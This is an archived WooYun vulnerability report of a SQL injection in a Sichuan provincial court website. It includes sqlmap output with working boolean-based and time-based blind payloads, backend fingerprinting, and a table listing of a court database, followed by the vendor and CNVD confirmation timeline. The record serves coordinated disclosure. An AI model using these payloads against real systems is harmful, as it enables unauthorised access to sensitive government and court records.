乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-28: 细节已通知厂商并且等待厂商处理中 2015-12-31: 厂商已经确认,细节仅向厂商公开 2016-01-10: 细节向核心白帽子及相关领域专家公开 2016-01-20: 细节向普通白帽子公开 2016-01-30: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
四川省高级人民法院!!!sa权限,涉及27个数据库。每个库里有上百个表,里面分别有其他各市区的数据。
注入点:http://**.**.**.**/ShowFunction.aspx?fybm=51
GET parameter 'fybm' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 51 HTTP(s) requests:---Parameter: fybm (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: fybm=51' AND 4565=4565 AND 'VhfJ'='VhfJ Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: fybm=51' AND 1249=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'UBNF'='UBNF---[20:33:30] [INFO] testing Microsoft SQL Server[20:33:36] [INFO] confirming Microsoft SQL Server[20:33:57] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2005
看一个数据库吧Database: sfgk_all+----------------------------+---------+| Table | Entries |+----------------------------+---------+| dbo.spgk_dsrxx | 149064 || dbo.spgk_ajjbxx | 92322 || dbo.SFGK_AJZ | 91588 || dbo.sfgk_web_cjws | 7454 || dbo.spgk_datafornet | 5648 || dbo.spgk_pmxx | 3649 || dbo.spgk_tsgk | 513 || dbo.web_count | 419 || dbo.SFGK_TSGK | 399 || dbo.spgk_fkpjmx | 383 || dbo.hytkh_hytglmx | 296 || dbo.spgk_code | 232 || dbo.sfgk_web_userlog | 226 || dbo.sfgk_spzl_dq | 214 || dbo.sfgk_spzl_dq_bak | 214 || dbo.spzl_dq | 213 || dbo.sfgk_web_info | 197 || dbo.spgk_sszn1 | 137 || dbo.spgk_sszn | 135 || dbo.xtgl_role_popedome | 123 || dbo.spgk_szydata | 87 || dbo.xtgl_user_role | 86 || dbo.spgk_dsrdw | 83 || dbo.queryconnect | 82 || dbo.sfgk_web_info_bak0630 | 79 || dbo.configure_info | 75 || dbo.xtgl_role | 65 || dbo.sfgk_web_links | 64 || dbo.zxjk_dsrxx | 63 || dbo.sfgk_web_powerrelation | 62 || dbo.temp_ygbg | 60 || dbo.hytkh_hytgl | 59 || dbo.spgk_fkpjhz | 44 || dbo.spgk_tpxw | 43 || dbo.sfgk_web_links1111 | 42 || dbo.sfgk_web_linksbak | 41 || dbo.sfgk_web_sxrycj | 40 || dbo.spgk_prejcdata | 40 || dbo.spgk_zhpc | 32 || dbo.zxaj_dcjl | 29 || dbo.zxaj_dcjl_qs | 29 || dbo.sfgk_web_powername | 27 || dbo.publicvariant | 24 || dbo.sfgk_web_userinfo | 24 || dbo.xzx_zxzkjl | 24 || dbo.xzx_zxzkjl_qs | 24 || dbo.imagelist | 21 || dbo.sfgk_web_fyggcj | 20 || dbo.sfgk_web_fyggcjbak | 20 || dbo.spgk_data_cst | 20 || dbo.spgk_prejcdata_cst | 20 || dbo.spgk_tongji | 20 || dbo.zxjk_ajjbxx | 20 || dbo.zxjk_ajjbxx_qs | 20 || dbo.zxaj_wtzx | 18 || dbo.zxaj_wtzx_qs | 18 || dbo.zxjk_qzcs | 17 || dbo.zxjk_qzcs_qs | 17 || dbo.spgk_gzyjfk | 14 || dbo.spgk_preszydata | 14 || dbo.spgk_dept | 13 || dbo.zxjk_bananrizhi | 13 || dbo.sfgk_web_tjsj | 12 || dbo.sfgk_web_tjsjbak | 12 || dbo.zxjk_ccczxx | 11 || dbo.zxjk_ccczxx_qs | 11 || dbo.spgk_flyz | 10 || dbo.zxaj_zxhj | 10 || dbo.zxaj_zxhj_qs | 10 || dbo.xtgl_powername | 9 || dbo.zxaj_zdlxjl | 8 || dbo.zxaj_zdlxjl_qs | 8 || dbo.spgk_keyid | 6 || dbo.spgk_keyid_szy | 6 || dbo.searchfor | 5 || dbo.zxaj_sfsjjl | 5 || dbo.zxaj_sfsjjl_qs | 5 || dbo.zxjk_zxfgxx | 5 || dbo.web_bgtbak | 4 || dbo.xzx_sfcc | 2 || dbo.xzx_sfcc_qs | 2 || dbo.zxaj_awryy | 2 || dbo.zxaj_sfcc | 2 || dbo.zxaj_tdwjf | 2 || dbo.zxaj_tdwjf_qs | 2 || dbo.hytkh_data_ajxt11 | 1 || dbo.hytkh_data_yjpj | 1 || dbo.spgk_keyidnew_szy | 1 || dbo.spgk_syscfg | 1 || dbo.xzx_zxyjspb | 1 || dbo.xzx_zxyjspb_qs | 1 || dbo.zxaj_jljl | 1 |+----------------------------+---------+
未深入。
危害等级:高
漏洞Rank:11
确认时间:2015-12-31 19:19
CNVD确认并复现所述情况,已经转由CNCERT下发给四川分中心,由其后续协调网站管理单位处置。
暂无
